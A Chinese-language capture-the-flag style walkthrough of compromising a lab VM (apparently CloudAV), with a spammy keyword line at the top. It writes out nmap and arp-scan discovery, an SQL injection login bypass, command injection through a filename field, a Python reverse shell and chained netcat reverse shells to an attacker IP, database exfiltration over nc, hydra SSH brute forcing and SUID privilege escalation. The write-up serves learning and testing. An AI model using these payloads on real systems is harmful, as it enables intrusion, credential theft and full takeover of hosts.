域名注册哪个网站最便宜,怎么做网站注册登入页面,聊城做网站推广,网站开发在线教程主机探测
arpscan
arp-scan -l 另一种方法arping
for i in $(seq 1 200); do sudo arping -c 1 192.168.56.$i; done
注意这个必须是root权限
端口探测
nmap
nmap -p- -sV -T4 192.168.56.104 发现8080端口
web测试
访问下web页面 1、通过逻辑点绕过
发送到xia_sq…主机探测
arpscan
arp-scan -l 另一种方法arping
for i in $(seq 1 200); do sudo arping -c 1 192.168.56.$i; done
注意这个必须是root权限
端口探测
nmap
nmap -p- -sV -T4 192.168.56.104 发现8080端口
web测试
访问下web页面 1、通过逻辑点绕过
发送到xia_sql发现可能存在sql注入 导入sql的fuzz字典跑包 发现返回包有异常观察这些长度异常的payload可以判断出是双引号自动闭合 那就直接” or 1 1 -- q绕过
2、爆破绕过
爆破许可证相当于就是密码么password 进一步测试
登入到这个页面之后进行观察 发现是输入文件名进行扫描相当于文件名起到一个选择扫描方式的作用拼接管道符看能否是在bash或者temtrol上执行的
执行 hello | ls
页面回显尝试监听进而更方便的执行指令 尝试监听
1、通过自带的python反弹shell
攻击机启动监听反弹shell时候可以用网上烂大街的python反弹shell因为前期通过nmap扫描发现有python2的环境
import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.56.128,5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]);
2、通过nc反弹shell【看运气看人服务器上有无nc】
攻击机启动4444端口的监听
nc -nvlp 4444
web页面输入
hello|nc 192.168.56.102 4444 -e /bin/sh# hello 使页面正常运行
# 192.168.56.102 攻击机的ip
# -e /bin/bsh 反弹回服务器的shell
# 注意最后一段我们不是单纯的为了监听而是为了让他反弹shell过来 但实际执行之后发现4444未能接受到任何信息说明很有可能是nc版本不同导致的-e参数无效有这个猜想之后可以直接去掉-e看看监听是否有问题
hello|nc 192.168.56.102 4444
发现监听没问题说明我们的猜想是对的
接下来通过串联nc的方式来代替-e参数反弹shell的问题
输入
hello |nc 192.168.56.102 4444 |/bin/bash |nc 192.168.56.102 3333# hello 确保web页面正常执行
# nc 192.168.56.102 4444监听攻击机的4444端口【建立连接】
# /bin/bash 将所有的指令传递给/bin/bash解析管道符实现的【传递指令并执行】
# nc 192.168.56.102 3333监听攻击机的3333端口【返回指令执行的结果】
# 【确保运行】|【建立连接】|【接受指令并解析】|【返回结果】
因此攻击机需要开启两个监听4444用于建立连接3333用于查看执行结果
成功监听 发现是scanner权限不够接下来的所有操作都是为了提权到root权限 主机信息收集
执行ls -l获取更多的信息查看哪些是可以利用的文件或工具 看见root权限下有执行权限的两个文件
其实可以逐个看下
app.py 看下数据库文件 发现是sqlite3 的数据库文件本地的数据库文件看看有没有sqlite环境从而查看下数据库文件内的机密信息 转存数据库文件
在靶机开启nc将database的内容传给攻击机的5555端口
nc -nvlp 192.168.56.102 5555 # 连接攻击机的5555端口监听并将database.sql的内容传递给攻击机的5555端口
在kali开启5555端口监听将监听到的内容传递给db.sql中
nc 5555 db1.sql
# 将nc的5555监听到的内容全部传给db.sql中
这里需要注意一个点过一小会主动断掉连接因为文件小已经传完了但没有回显所以你不知道 查看数据库
# sqlite3 --进入sqlite.open db1.sql --打开db1文件.database -- 进入数据库.dump --dump下来有了数据库密码结合下用户
ssh爆破
监听上使用cat /etc/passwd|grep /bin/bash 获取到账号结合这个数据库的密码尝试下ssh爆破利用九头蛇 hydra -l user -P password.txt ssh://192.168.56.104
执行后发现全部失败爆破失败 进一步信息收集
向上跳一级查看其他文件 找见一个s权限文件尝试通过这个文件间接执行root权限下的指令
SUID提权
cat update_cloudav.c 通过分析代码可以设想当我们执行update_cloudav时必须跟上一个参数尝试下a参数命令行输入
./update_cloudav a 日志报错但不清楚这个日志报错会对程序或者提权有怎样的作用会不会影响后续提权等
所以正常尝试就好
依旧采用nc串联的方式尝试利用root权限
输入
./update_cloudav a|nc 192.168.56.102 555|/bin/bash|nc 192.168.56.102 666
并在攻击机开启监听555和666端口的监听指令依旧是nc -nvlp [端口号] 成功提权至root权限 小bug刚开始是监听向5555和6666但6666的监听不到5555也是三次的两次监听不到所以这种情况下换下端口就行
